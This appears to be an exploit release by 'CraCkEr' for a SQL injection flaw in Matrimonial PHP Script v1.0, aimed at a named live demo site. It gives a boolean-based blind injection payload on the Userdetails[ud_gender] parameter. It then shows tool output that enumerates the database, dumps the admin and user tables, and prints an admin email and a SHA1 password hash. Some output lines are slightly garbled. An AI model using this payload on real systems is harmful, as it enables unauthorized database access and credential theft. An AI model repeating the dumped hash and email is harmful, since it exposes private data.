Share
## https://sploitus.com/exploit?id=PACKETSTORM:168010
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Exploits ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr โ โ :
โ Website : uisort.com โ โ โ
โ Vendor : Uisort Technologies Pvt. Ltd. โ โ โ
โ Software : Matrimonial PHP Script v1.0 โ โ Matrimonial Script PHP tailored with โ
โ Demo : stage.matrimic.in โ โ advanced features website โ
โ Vuln Type: Remote SQL Injection โ โ & mobile apps from matrimic โ
โ Method : GET โ โ โ
โ Impact : Database Access โ โ โ
โ โ โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ B4nks-NET irc.b4nks.tk #unix โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ Typically used for remotely exploitable vulnerabilities that can lead to โ
โ system compromise. โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y
CryptoJob (Twitter) twitter.com/CryptozJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2022 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
GET parameter 'Userdetails[ud_gender]' is vulnerable
---
Parameter: Userdetails[ud_gender] (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Userdetails[ud_gender]=1 AND 2636=2636
---
[+] Starting the Attack
[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[INFO] fetching current database
[INFO] retrieved: stage_db_qa
[INFO] fetching number of tables for database 'stage_db_qa'
Database: stage_db_qa
[37 tables]
+--------------------+
| YiiCache |
| YiiLog |
| mc_admin |
| mc_blocklist |
| mc_caste |
| mc_city |
| mc_cms |
| mc_contact |
| mc_contact_history |
| mc_country |
| mc_currency |
| mc_deleteprofile |
| mc_education |
| mc_feedback |
| mc_gallery |
| mc_height |
| mc_horoscope |
| mc_import_jobs |
| mc_interest |
| mc_language |
| mc_message |
| mc_occupation |
| mc_partner |
| mc_plan |
| mc_profile_viewed |
| mc_religion |
| mc_searchlist |
| mc_settings |
| mc_shortlist |
| mc_sms_history |
| mc_state |
| mc_subcaste |
| mc_success_story |
| mc_toungue |
| mc_transaction |
| mc_user |
| mc_userdetails |
+--------------------+
[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_admin
[4 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| admin_email | varchar(32) |
| admin_id | int(11) |
| admin_name | varchar(32) |
| admin_status | int(11) |
+--------------+-------------+
[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_admin
[1 entry]
+----------+-----------------------+------------+--------------+
| admin_id | admin_email | admin_name | admin_status |
+----------+-----------------------+------------+--------------+
| 1 | admin@mat\x81imic.com | Admin | 1 |
+----------+-----------------------+------------+--------------+
[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_user
[20 columns]
+------------------------+--------------+
| Column | Type |
+------------------------+--------------+
| api_token | varchar(255) |
| code | varchar(128) |
| device | varchar(32) |
| user_activecode | varchar(32) |
| user_activedate | datetime |
| user_activestatus | int(11) |
| user_android_device_id | varchar(255) |
| user_email | varchar(32) |
| user_id | int(11) |
| user_ios_device_id | varchar(255) |
| user_ipaddress | varchar(32( |
| user_lastlogin | datetime |
| user_mobile | bigint(20) |
| user_opensource | varchar(32) |
| user_password | varchar(255) |
| user_salt | varchar(64) |
| user_status | int(11) |
| user_type | int(11) |
| user_userid | int(11) |
| user_verified_token | varchar(255) |
+------------------------+--------------+
[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'
Database: stage_db_qa
Table: mc_user
[1 entry]
+---------+--------------------+------------------------------------------+-----------+-------------+
| user_id | user_email | user_password | user_type | user_userid |
+---------+--------------------+------------------------------------------+-----------+-------------+
| 1 | admin@matrimic.com | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1 | 1 |
+---------+--------------------+------------------------------------------+-----------+-------------+
Possible Algorithms: SHA1
[-] Done